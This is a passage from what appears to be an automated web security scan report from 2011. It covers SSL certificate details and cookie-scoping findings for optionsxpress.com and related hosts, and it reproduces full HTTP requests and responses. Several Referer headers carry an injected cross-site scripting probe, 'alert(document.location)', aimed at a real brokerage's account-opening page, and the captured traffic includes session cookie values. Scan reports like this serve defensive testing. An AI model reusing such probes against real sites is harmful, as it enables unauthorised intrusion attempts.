8.17. https://server.iad.liveperson.net/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://server.iad.liveperson.net
Path:   /

Issue detail

The server presented a valid, trusted SSL certificate. This issue is purely informational.

The server presented the following certificates:

Server certificate

Issued to:  SERVER.IAD.LIVEPERSON.NET
Issued by:  VeriSign Class 3 Secure Server CA - G2
Valid from:  Wed Jan 27 18:00:00 GMT-06:00 2010
Valid to:  Sat Jan 28 17:59:59 GMT-06:00 2012

Certificate chain #1

Issued to:  VeriSign Class 3 Secure Server CA - G2
Issued by:  VeriSign Trust Network
Valid from:  Tue Mar 24 18:00:00 GMT-06:00 2009
Valid to:  Sun Mar 24 17:59:59 GMT-06:00 2019

Certificate chain #2

Issued to:  VeriSign Trust Network
Issued by:  VeriSign Trust Network
Valid from:  Sun May 17 18:00:00 GMT-06:00 1998
Valid to:  Tue Aug 01 17:59:59 GMT-06:00 2028

8.18. https://sites.google.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://sites.google.com
Path:   /

Issue detail

The server presented a valid, trusted SSL certificate. This issue is purely informational.

The server presented the following certificates:

Server certificate

Issued to:  *.google.com
Issued by:  Google Internet Authority
Valid from:  Thu Aug 11 21:49:02 GMT-06:00 2011
Valid to:  Sat Aug 11 21:59:02 GMT-06:00 2012

Certificate chain #1

Issued to:  Google Internet Authority
Issued by:  Equifax Secure Certificate Authority
Valid from:  Mon Jun 08 14:43:27 GMT-06:00 2009
Valid to:  Fri Jun 07 13:43:27 GMT-06:00 2013

Certificate chain #2

Issued to:  Equifax Secure Certificate Authority
Issued by:  Equifax Secure Certificate Authority
Valid from:  Sat Aug 22 10:41:51 GMT-06:00 1998
Valid to:  Wed Aug 22 10:41:51 GMT-06:00 2018

8.19. https://www.google.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.google.com
Path:   /

Issue detail

The server presented a valid, trusted SSL certificate. This issue is purely informational.

The server presented the following certificates:

Server certificate

Issued to:  www.google.com
Issued by:  Thawte SGC CA
Valid from:  Thu Dec 17 18:00:00 GMT-06:00 2009
Valid to:  Sun Dec 18 17:59:59 GMT-06:00 2011

Certificate chain #1

Issued to:  Thawte SGC CA
Issued by:  Class 3 Public Primary Certification Authority
Valid from:  Wed May 12 18:00:00 GMT-06:00 2004
Valid to:  Mon May 12 17:59:59 GMT-06:00 2014

Certificate chain #2

Issued to:  Class 3 Public Primary Certification Authority
Issued by:  Class 3 Public Primary Certification Authority
Valid from:  Sun Jan 28 18:00:00 GMT-06:00 1996
Valid to:  Wed Aug 02 17:59:59 GMT-06:00 2028

8.20. https://www.optionsxpress.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.optionsxpress.com
Path:   /

Issue detail

The server presented a valid, trusted SSL certificate. This issue is purely informational.

The server presented the following certificates:

Server certificate

Issued to:  www.optionsxpress.com
Issued by:  VeriSign Class 3 Extended Validation SSL SGC CA
Valid from:  Sun Jan 24 18:00:00 GMT-06:00 2010
Valid to:  Mon Feb 06 17:59:59 GMT-06:00 2012

Certificate chain #1

Issued to:  VeriSign Class 3 Extended Validation SSL SGC CA
Issued by:  VeriSign Class 3 Public Primary Certification Authority - G5
Valid from:  Tue Nov 07 18:00:00 GMT-06:00 2006
Valid to:  Mon Nov 07 17:59:59 GMT-06:00 2016

Certificate chain #2

Issued to:  VeriSign Class 3 Public Primary Certification Authority - G5
Issued by:  Class 3 Public Primary Certification Authority
Valid from:  Tue Nov 07 18:00:00 GMT-06:00 2006
Valid to:  Sun Nov 07 17:59:59 GMT-06:00 2021

Certificate chain #3

Issued to:  Class 3 Public Primary Certification Authority
Issued by:  Class 3 Public Primary Certification Authority
Valid from:  Sun Jan 28 18:00:00 GMT-06:00 1996
Valid to:  Wed Aug 02 17:59:59 GMT-06:00 2028

8.21. https://www.optionsxpress.com.au/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.optionsxpress.com.au
Path:   /

Issue detail

The server presented a valid, trusted SSL certificate. This issue is purely informational.

The server presented the following certificates:

Server certificate

Issued to:  www.optionsxpress.com.au,ST=Illinois
Issued by:  Akamai Subordinate CA 3
Valid from:  Sat May 07 01:31:44 GMT-06:00 2011
Valid to:  Mon May 07 01:31:44 GMT-06:00 2012

Certificate chain #1

Issued to:  Akamai Subordinate CA 3
Issued by:  GTE CyberTrust Global Root
Valid from:  Thu May 11 09:32:00 GMT-06:00 2006
Valid to:  Sat May 11 17:59:00 GMT-06:00 2013

Certificate chain #2

Issued to:  GTE CyberTrust Global Root
Issued by:  GTE CyberTrust Global Root
Valid from:  Wed Aug 12 18:29:00 GMT-06:00 1998
Valid to:  Mon Aug 13 17:59:00 GMT-06:00 2018

8.22. https://www.pfgboss.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.pfgboss.com
Path:   /

Issue detail

The server presented a valid, trusted SSL certificate. This issue is purely informational.

The server presented the following certificates:

Server certificate

Issued to:  www.pfgboss.com
Issued by:  Go Daddy Secure Certification Authority
Valid from:  Mon Apr 11 15:58:51 GMT-06:00 2011
Valid to:  Thu Apr 11 14:20:17 GMT-06:00 2013

Certificate chain #1

Issued to:  Go Daddy Secure Certification Authority
Issued by:  Go Daddy Class 2 Certification Authority
Valid from:  Wed Nov 15 19:54:37 GMT-06:00 2006
Valid to:  Sun Nov 15 19:54:37 GMT-06:00 2026

Certificate chain #2

Issued to:  Go Daddy Class 2 Certification Authority
Issued by:  http://www.valicert.com/
Valid from:  Tue Jun 29 11:06:20 GMT-06:00 2004
Valid to:  Sat Jun 29 11:06:20 GMT-06:00 2024

Certificate chain #3

Issued to:  http://www.valicert.com/
Issued by:  http://www.valicert.com/
Valid from:  Fri Jun 25 18:19:54 GMT-06:00 1999
Valid to:  Tue Jun 25 18:19:54 GMT-06:00 2019

8.23. https://www.secureclient5.ranweb.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.secureclient5.ranweb.com
Path:   /

Issue detail

The server presented a valid, trusted SSL certificate. This issue is purely informational.

The server presented the following certificates:

Server certificate

Issued to:  www.secureclient5.ranweb.com
Issued by:  VeriSign Class 3 International Server CA - G3
Valid from:  Thu May 12 18:00:00 GMT-06:00 2011
Valid to:  Mon May 14 17:59:59 GMT-06:00 2012

Certificate chain #1

Issued to:  VeriSign Class 3 International Server CA - G3
Issued by:  VeriSign Class 3 Public Primary Certification Authority - G5
Valid from:  Sun Feb 07 18:00:00 GMT-06:00 2010
Valid to:  Fri Feb 07 17:59:59 GMT-06:00 2020

Certificate chain #2

Issued to:  VeriSign Class 3 Public Primary Certification Authority - G5
Issued by:  Class 3 Public Primary Certification Authority
Valid from:  Tue Nov 07 18:00:00 GMT-06:00 2006
Valid to:  Sun Nov 07 17:59:59 GMT-06:00 2021

Certificate chain #3

Issued to:  Class 3 Public Primary Certification Authority
Issued by:  Class 3 Public Primary Certification Authority
Valid from:  Sun Jan 28 18:00:00 GMT-06:00 1996
Valid to:  Wed Aug 02 17:59:59 GMT-06:00 2028

9. Cookie scoped to parent domain  previous  next
There are 113 instances of this issue:

Issue background

A cookie's domain attribute determines which domains can access the cookie. Browsers will automatically submit the cookie in requests to in-scope domains, and those domains will also be able to access the cookie via JavaScript. If a cookie is scoped to a parent domain, then that cookie will be accessible by the parent domain and also by any other subdomains of the parent domain. If the cookie contains sensitive data (such as a session token) then this data may be accessible by less trusted or less secure applications residing at those domains, leading to a security compromise.

Issue remediation

By default, cookies are scoped to the issuing domain and all subdomains. If you remove the explicit domain attribute from your Set-cookie directive, then the cookie will have this default scope, which is safe and appropriate in most situations. If you particularly need a cookie to be accessible by a parent domain, then you should thoroughly review the security of the applications residing on that domain and its subdomains, and confirm that you are willing to trust the people and systems which support those applications.


9.1. http://pixel.everesttech.net/2164/cq  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://pixel.everesttech.net
Path:   /2164/cq

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /2164/cq?ev_sid=3&ev_ln=futures%20options&ev_crx=7551788913&ev_mt=b&ev_n=g&ev_ltx=&ev_pl=&url=http%3A//www.optionsxpress.com/promos/experience_an_options_specialist.aspx%3Fintcmp%3Dlp_sales_futures%26cmpid%3Dgsus23305007 HTTP/1.1
Host: pixel.everesttech.net
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?sourceid=chrome&ie=UTF-8&q=futures+trading
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: everest_g_v2=g_surferid~zqROZUBXyFQAAIdR

Response

HTTP/1.1 302 Found
Date: Thu, 08 Sep 2011 19:24:37 GMT
Server: Apache
Set-Cookie: everest_session_v2=CeBOaRZ1-iwAAIdj; path=/; domain=.everesttech.net
Set-Cookie: everest_g_v2=g_surferid~zqROZUBXyFQAAIdR; path=/; domain=.everesttech.net; expires=Fri, 13-Sep-2030 06:04:37 GMT
P3P: CP="NOI NID DEVa PSAa PSDa OUR IND PUR COM NAV INT DEM"
Cache-Control: no-cache
Location: http://www.optionsxpress.com/promos/experience_an_options_specialist.aspx?intcmp=lp_sales_futures&cmpid=gsus23305007&ef_id=zqROZUBXyFQAAIdR:20110908192437:s
Content-Length: 348
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.optionsxpress.com/promos/experience_
...[SNIP]...

9.2. https://account.optionsxpress.com/OpenAccount/Index  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://account.optionsxpress.com
Path:   /OpenAccount/Index

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /OpenAccount/Index?intcmp=lp_sales_futures&firm=OX HTTP/1.1
Host: account.optionsxpress.com
Connection: keep-alive
Referer: http://www.optionsxpress.com/promos/experience_an_options_specialist.aspx?intcmp=lp_sales_futures&cmpid=gsus23305007&ef_id=zqROZUBXyFQAAIdR:20110908192437:s
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TLTSID=AF390C804BE14C3A1579AEAAAD65A123; mbox=check#true#1315527980|session#1315527919598-875378#1315529780|PC#1315527919598-875378.19#1316737521; s_cc=true; s_sq=%5B%5BB%5D%5D; s_vi=[CS]v1|27348B3F85159F3A-600001768000142C[CE]; s_ev23=%5B%5B%27gsus23305007%27%2C%271315527951277%27%5D%5D; s_campaign=gsus23305007; TLTHID=7168044948469A60359581B20B826924

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 86733
Content-Type: text/html; charset=utf-8
Expires: Thu, 08 Sep 2011 19:25:21 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-AspNetMvc-Version: 1.0
Set-Cookie: TLTHID=8BDB9C054DE94B794A725090608A94A2; Path=/; Domain=.optionsxpress.com
Date: Thu, 08 Sep 2011 19:25:20 GMT
Vary: Accept-Encoding
Connection: Keep-Alive


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head><title>
   

</title><link rel="sty
...[SNIP]...

9.3. https://account.optionsxpress.com/OpenAccount/NewAccountAjax/GenericHandler  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://account.optionsxpress.com
Path:   /OpenAccount/NewAccountAjax/GenericHandler

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /OpenAccount/NewAccountAjax/GenericHandler?methodName=GetFirmFromCountry&parameters=1 HTTP/1.1
Host: account.optionsxpress.com
Connection: keep-alive
Referer: https://account.optionsxpress.com/OpenAccount/Index?intcmp=lp_sales_futures&firm=OX
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: application/json, text/javascript, */*; q=0.01
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TLTSID=AF390C804BE14C3A1579AEAAAD65A123; mbox=check#true#1315527980|session#1315527919598-875378#1315529780|PC#1315527919598-875378.19#1316737521; s_sq=%5B%5BB%5D%5D; s_vi=[CS]v1|27348B3F85159F3A-600001768000142C[CE]; s_ev23=%5B%5B%27gsus23305007%27%2C%271315527951277%27%5D%5D; s_campaign=gsus23305007; Firm=OX; TLTHID=6BF746C24651B1BAD934E8B86A795596; INTCMP=lp_sales_futures; s_pers=%20gpv_pn%3DOpenAccountprop5Index%7C1315529764039%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Length: 4
Content-Type: application/json; charset=utf-8
Expires: -1
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-AspNetMvc-Version: 1.0
Set-Cookie: TLTHID=DAA835CC43F5D88C7C759C8916AE73EE; Path=/; Domain=.optionsxpress.com
Date: Thu, 08 Sep 2011 19:25:26 GMT

"OX"

9.4. https://account.optionsxpress.com/OpenAccount/Scripts/nap.css  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://account.optionsxpress.com
Path:   /OpenAccount/Scripts/nap.css

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /OpenAccount/Scripts/nap.css HTTP/1.1
Host: account.optionsxpress.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://account.optionsxpress.com/OpenAccount/Index?intcmp=lp_sales_futures&firm=OXb5a37%0aalert(document.location)//18aaa9ddc45
Cookie: TLTHID=0CB03A254689E5598130BFBF7D2A396D

Response

HTTP/1.1 200 OK
Content-Length: 8210
Content-Type: text/css
Content-Location: http://account.optionsxpress.com/OpenAccount/Scripts/nap.css
Last-Modified: Tue, 24 May 2011 16:44:37 GMT
Accept-Ranges: bytes
ETag: "80482bde311acc1:efb"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: TLTHID=0CB5EB094D57EFBDD7F02D873075B0F6; Path=/; Domain=.optionsxpress.com
Set-Cookie: TLTSID=0CB5EB094D57EFBDD7F02D873075B0F6; Path=/; Domain=.optionsxpress.com
Date: Thu, 08 Sep 2011 19:33:28 GMT
Vary: Accept-Encoding
Connection: Keep-Alive

*
{
margin: 0;
padding: 0; /*font:bold 12px "Lucida Grande", Arial, sans-serif; */
}

#columnContainerTwo,
#openAccount
...[SNIP]...

9.5. https://account.optionsxpress.com/OpenAccount/Scripts/napgeneral.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://account.optionsxpress.com
Path:   /OpenAccount/Scripts/napgeneral.js

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /OpenAccount/Scripts/napgeneral.js HTTP/1.1
Host: account.optionsxpress.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://account.optionsxpress.com/OpenAccount/Index?intcmp=lp_sales_futures&firm=OXb5a37%0aalert(document.location)//18aaa9ddc45
Cookie: TLTHID=0CB03A254689E5598130BFBF7D2A396D

Response

HTTP/1.1 200 OK
Content-Length: 69748
Content-Type: application/x-javascript
Content-Location: http://account.optionsxpress.com/OpenAccount/Scripts/napgeneral.js
Last-Modified: Tue, 10 May 2011 16:55:21 GMT
Accept-Ranges: bytes
ETag: "80623dc33fcc1:ef3"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: TLTHID=763E378F444B9764FB516DBF60432013; Path=/; Domain=.optionsxpress.com
Set-Cookie: TLTSID=763E378F444B9764FB516DBF60432013; Path=/; Domain=.optionsxpress.com
Date: Thu, 08 Sep 2011 19:33:28 GMT
Vary: Accept-Encoding
Connection: Keep-Alive

/*******************************************************************************************************************
   SB 08/12/2010
******************************************************************
...[SNIP]...

9.6. https://account.optionsxpress.com/OpenAccount/Scripts/naponload.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://account.optionsxpress.com
Path:   /OpenAccount/Scripts/naponload.js

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /OpenAccount/Scripts/naponload.js HTTP/1.1
Host: account.optionsxpress.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://account.optionsxpress.com/OpenAccount/Index?intcmp=lp_sales_futures&firm=OXb5a37%0aalert(document.location)//18aaa9ddc45
Cookie: TLTHID=0CB03A254689E5598130BFBF7D2A396D

Response

HTTP/1.1 200 OK
Content-Length: 12001
Content-Type: application/x-javascript
Content-Location: http://account.optionsxpress.com/OpenAccount/Scripts/naponload.js
Last-Modified: Tue, 23 Nov 2010 14:53:52 GMT
Accept-Ranges: bytes
ETag: "040423e1e8bcb1:fc8"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: TLTHID=E9AF2F6144A0120B1C2E90B8BF0628B1; Path=/; Domain=.optionsxpress.com
Set-Cookie: TLTSID=E9AF2F6144A0120B1C2E90B8BF0628B1; Path=/; Domain=.optionsxpress.com
Date: Thu, 08 Sep 2011 19:33:28 GMT
Vary: Accept-Encoding
Connection: Keep-Alive

/*******************************************************************************************************************
   SB 08/12/2010
******************************************************************
...[SNIP]...

9.7. https://account.optionsxpress.com/OpenAccount/Scripts/napvalidate.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://account.optionsxpress.com
Path:   /OpenAccount/Scripts/napvalidate.js

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /OpenAccount/Scripts/napvalidate.js HTTP/1.1
Host: account.optionsxpress.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://account.optionsxpress.com/OpenAccount/Index?intcmp=lp_sales_futures&firm=OXb5a37%0aalert(document.location)//18aaa9ddc45
Cookie: TLTHID=0CB03A254689E5598130BFBF7D2A396D

Response

HTTP/1.1 200 OK
Content-Length: 154727
Content-Type: application/x-javascript
Content-Location: http://account.optionsxpress.com/OpenAccount/Scripts/napvalidate.js
Last-Modified: Thu, 07 Apr 2011 17:11:23 GMT
Accept-Ranges: bytes
ETag: "802f1d246f5cb1:e65"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: TLTHID=4489136141A3C546F157268319DC82E2; Path=/; Domain=.optionsxpress.com
Set-Cookie: TLTSID=4489136141A3C546F157268319DC82E2; Path=/; Domain=.optionsxpress.com
Date: Thu, 08 Sep 2011 19:33:28 GMT
Vary: Accept-Encoding
Connection: Keep-Alive

/*******************************************************************************************************************
   SB 08/12/2010
******************************************************************
...[SNIP]...

9.8. https://account.optionsxpress.com/css/oxps.css  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://account.optionsxpress.com
Path:   /css/oxps.css

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /css/oxps.css HTTP/1.1
Host: account.optionsxpress.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://account.optionsxpress.com/OpenAccount/Index?intcmp=lp_sales_futures&firm=OXb5a37%0aalert(document.location)//18aaa9ddc45
Cookie: TLTHID=0CB03A254689E5598130BFBF7D2A396D

Response

HTTP/1.1 200 OK
Content-Length: 66752
Content-Type: text/css
Last-Modified: Mon, 10 May 2010 20:56:05 GMT
Accept-Ranges: bytes
ETag: "b095c23483f0ca1:eba"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: TLTHID=4DCE15C74DC6FFB53C82A6AF748A4ACA; Path=/; Domain=.optionsxpress.com
Set-Cookie: TLTSID=4DCE15C74DC6FFB53C82A6AF748A4ACA; Path=/; Domain=.optionsxpress.com
Date: Thu, 08 Sep 2011 19:33:29 GMT
Vary: Accept-Encoding
Connection: Keep-Alive

@import url("https://images.optionsxpress.com/css/reset.css");

html,body {
   background: #ffffff;
   background-image: url("https://images.optionsxpress.com/images/prelogin/ox_bg.jpg");
   margin: 0p
...[SNIP]...

9.9. https://account.optionsxpress.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://account.optionsxpress.com
Path:   /favicon.ico

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
Host: account.optionsxpress.com
Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TLTSID=AF390C804BE14C3A1579AEAAAD65A123; mbox=check#true#1315527980|session#1315527919598-875378#1315529780|PC#1315527919598-875378.19#1316737521; s_sq=%5B%5BB%5D%5D; s_vi=[CS]v1|27348B3F85159F3A-600001768000142C[CE]; s_ev23=%5B%5B%27gsus23305007%27%2C%271315527951277%27%5D%5D; s_campaign=gsus23305007; INTCMP=lp_sales_futures; s_pers=%20gpv_pn%3DOpenAccountprop5Index%7C1315529764039%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; Firm=OX; TLTHID=61F93426422DA13562D689B5022DBFC6

Response

HTTP/1.1 200 OK
Content-Length: 1150
Content-Type: image/x-icon
Last-Modified: Fri, 20 Mar 2009 15:16:36 GMT
Accept-Ranges: bytes
ETag: "062bdc6ea9c91:fb9"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: TLTHID=F04D32D8484F69A30C544985DCE10F86; Path=/; Domain=.optionsxpress.com
Date: Thu, 08 Sep 2011 19:25:31 GMT

............ .h.......(....... ..... ...................................................................................................................................................................
...[SNIP]...

9.10. https://account.optionsxpress.com/images/btn_next_step.jpg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://account.optionsxpress.com
Path:   /images/btn_next_step.jpg

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/btn_next_step.jpg HTTP/1.1
Host: account.optionsxpress.com
Connection: keep-alive
Referer: https://account.optionsxpress.com/OpenAccount/Index?intcmp=lp_sales_futures&firm=OX
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TLTSID=AF390C804BE14C3A1579AEAAAD65A123; mbox=check#true#1315527980|session#1315527919598-875378#1315529780|PC#1315527919598-875378.19#1316737521; s_sq=%5B%5BB%5D%5D; s_vi=[CS]v1|27348B3F85159F3A-600001768000142C[CE]; s_ev23=%5B%5B%27gsus23305007%27%2C%271315527951277%27%5D%5D; s_campaign=gsus23305007; Firm=OX; TLTHID=6BF746C24651B1BAD934E8B86A795596; INTCMP=lp_sales_futures; s_pers=%20gpv_pn%3DOpenAccountprop5Index%7C1315529764039%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B

Response

HTTP/1.1 200 OK
Content-Length: 2414
Content-Type: image/jpeg
Last-Modified: Wed, 05 Nov 2008 18:29:43 GMT
Accept-Ranges: bytes
ETag: "805ab78743fc91:e6d"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: TLTHID=A8232ADF480D39289D31E09763CACF10; Path=/; Domain=.optionsxpress.com
Date: Thu, 08 Sep 2011 19:25:27 GMT

......JFIF.....d.d......Ducky.......<......Adobe.d....................    ...    .......

.

..........................................................................................................@.X..
...[SNIP]...

9.11. https://account.optionsxpress.com/images/icon_arrow.jpg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://account.optionsxpress.com
Path:   /images/icon_arrow.jpg

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /images/icon_arrow.jpg HTTP/1.1
Host: account.optionsxpress.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://account.optionsxpress.com/OpenAccount/Index?intcmp=lp_sales_futures&firm=OXb5a37%0aalert(document.location)//18aaa9ddc45
Cookie: TLTHID=0CB03A254689E5598130BFBF7D2A396D

Response

HTTP/1.1 200 OK
Content-Length: 449
Content-Type: image/jpeg
Last-Modified: Thu, 10 Jul 2008 18:51:58 GMT
Accept-Ranges: bytes
ETag: "6027ab7bee2c81:ef3"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: TLTHID=40AC7ADE4E4FC6801AC62196A778AB08; Path=/; Domain=.optionsxpress.com
Set-Cookie: TLTSID=40AC7ADE4E4FC6801AC62196A778AB08; Path=/; Domain=.optionsxpress.com
Date: Thu, 08 Sep 2011 19:33:30 GMT

......JFIF.....d.d......Ducky.......<......Adobe.d....................    ...    .......

.

..............................................................................................................
...[SNIP]...

9.12. https://account.optionsxpress.com/images/icons/log_in.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://account.optionsxpress.com
Path:   /images/icons/log_in.gif

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /images/icons/log_in.gif HTTP/1.1
Host: account.optionsxpress.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://account.optionsxpress.com/OpenAccount/Index?intcmp=lp_sales_futures&firm=OXb5a37%0aalert(document.location)//18aaa9ddc45
Cookie: TLTHID=0CB03A254689E5598130BFBF7D2A396D

Response

HTTP/1.1 200 OK
Content-Length: 1929
Content-Type: image/gif
Last-Modified: Thu, 06 Nov 2008 19:47:15 GMT
Accept-Ranges: bytes
